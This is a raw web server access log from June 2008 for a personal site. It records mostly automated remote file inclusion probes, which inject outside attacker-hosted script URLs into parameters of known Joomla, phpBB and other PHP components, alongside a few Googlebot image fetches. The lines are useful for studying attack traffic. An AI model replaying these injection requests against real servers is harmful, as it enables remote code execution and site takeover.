209.62.115.202 - - [24/Jun/2008:11:21:19 -0700] "GET /logs//sources/template.php?CONFIG[main_path]=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:21:29 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:21:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:21:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:21:46 -0700] "GET /logs/access_080204.log/index2.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:21:58 -0700] "GET /logs/access.log/index.php?pag=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:22:04 -0700] "GET /logs/index.php?pag=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.29 - - [24/Jun/2008:11:22:12 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:11:22:12 -0700] "GET /logs/access_080423.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:22:18 -0700] "GET /logs/access_080121.log/send_reminders.php?includedir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:22:18 -0700] "GET /send_reminders.php?includedir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:22:19 -0700] "GET /logs/send_reminders.php?includedir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:22:19 -0700] "GET /index.php?pag=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.65" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:22:45 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:11:22:51 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:22:53 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:22:53 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:22:53 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:22:56 -0700] "GET /megumi/minamigrad2k8/IMG_1650.CR2 HTTP/1.1" 200 8677781 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:22:58 -0700] "GET /logs/classes/core/language.php?rootdir=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:22:58 -0700] "GET /classes/core/language.php?rootdir=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:23:01 -0700] "GET /megumi/minamigrad2k8/IMG_1719.CR2 HTTP/1.1" 200 8737993 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:11:23:06 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:11:23:07 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:23:09 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:23:09 -0700] "GET /logs/access.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:23:09 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:23:10 -0700] "GET /logs/access_080218.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:23:12 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:23:12 -0700] "GET /logs/access.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:23:12 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:23:13 -0700] "GET /logs/access_080218.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:23:14 -0700] "GET /logs/access_080507.log/contenido.php?sec=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:23:15 -0700] "GET /contenido.php?sec=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:23:15 -0700] "GET /logs/contenido.php?sec=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:23:20 -0700] "GET /logs/access_080201.log/send_reminders.php?includedir=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:23:43 -0700] "GET /logs//poll/png.php?include_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
209.62.115.202 - - [24/Jun/2008:11:23:43 -0700] "GET //poll/png.php?include_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:11:23:43 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.187.138 - - [24/Jun/2008:11:23:56 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:23:56 -0700] "GET /megumi/minamigrad2k8/IMG_1626.CR2 HTTP/1.1" 200 8121798 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
81.169.187.138 - - [24/Jun/2008:11:23:56 -0700] "GET /errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.187.138 - - [24/Jun/2008:11:23:57 -0700] "GET /logs/errors.php?error=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:24:01 -0700] "GET /megumi/minamigrad2k8/IMG_1644.CR2 HTTP/1.1" 200 8897345 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:24:11 -0700] "GET /logs/access_080312.log/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:24:47 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:24:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:24:57 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:24:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:25:17 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:25:17 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:25:21 -0700] "GET /logs/access_080425.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:25:22 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:25:22 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:25:47 -0700] "GET /megumi/minamigrad2k8/IMG_1677.CR2 HTTP/1.1" 200 8629194 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:25:48 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:25:48 -0700] "GET /logs/access.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:25:48 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:25:57 -0700] "GET /logs/access_080218.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:26:05 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.167.194.105 - - [24/Jun/2008:11:26:06 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:11:26:11 -0700] "GET /logs/access_080131.log/index.php?pagina=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:26:18 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:26:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:26:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:26:26 -0700] "GET /megumi/minamigrad2k8/IMG_1597.CR2 HTTP/1.1" 200 9453084 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:11:26:27 -0700] "GET /logs/index.php?pagina=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:11:26:37 -0700] "GET /index.php?pagina=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:26:38 -0700] "GET /logs/access_080423.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:26:38 -0700] "GET /logs/access_080425.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:26:39 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:26:39 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:26:44 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:27:00 -0700] "GET /logs/access_080301.log/facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:27:00 -0700] "GET /facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:27:00 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:27:34 -0700] "GET /logs/access_080312.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:27:35 -0700] "GET /logs/access_080229.log/facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:28:26 -0700] "GET /logs/access_080312.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:28:35 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:28:41 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:28:50 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages&cpage=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:11:28:57 -0700] "GET //index.php?option=com_custompages&cpage=http://skill-station.net/help/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:28:57 -0700] "GET /logs//index.php?go=listings&listing_id=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:29:18 -0700] "GET //index.php?go=listings&listing_id=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 500 374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:29:28 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:29:44 -0700] "GET /logs/access.log/index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:29:44 -0700] "GET /logs/access.log/index.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:29:51 -0700] "GET /logs/access_080330.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:29:51 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:29:51 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:29:55 -0700] "GET /logs/index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:29:55 -0700] "GET /logs/index.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:30:04 -0700] "GET /logs/access.log/main.php?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:30:04 -0700] "GET /main.php?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:30:05 -0700] "GET /logs/main.php?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:30:05 -0700] "GET /index.php?meio=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:30:06 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:30:06 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:30:06 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:11:30:11 -0700] "GET /index.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:30:21 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:30:38 -0700] "GET /logs/access_080215.log/index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:30:39 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:30:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:30:43 -0700] "GET /logs/index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:30:59 -0700] "GET /index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.65" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:05 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:31:30 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:31:30 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:31:31 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:31:32 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
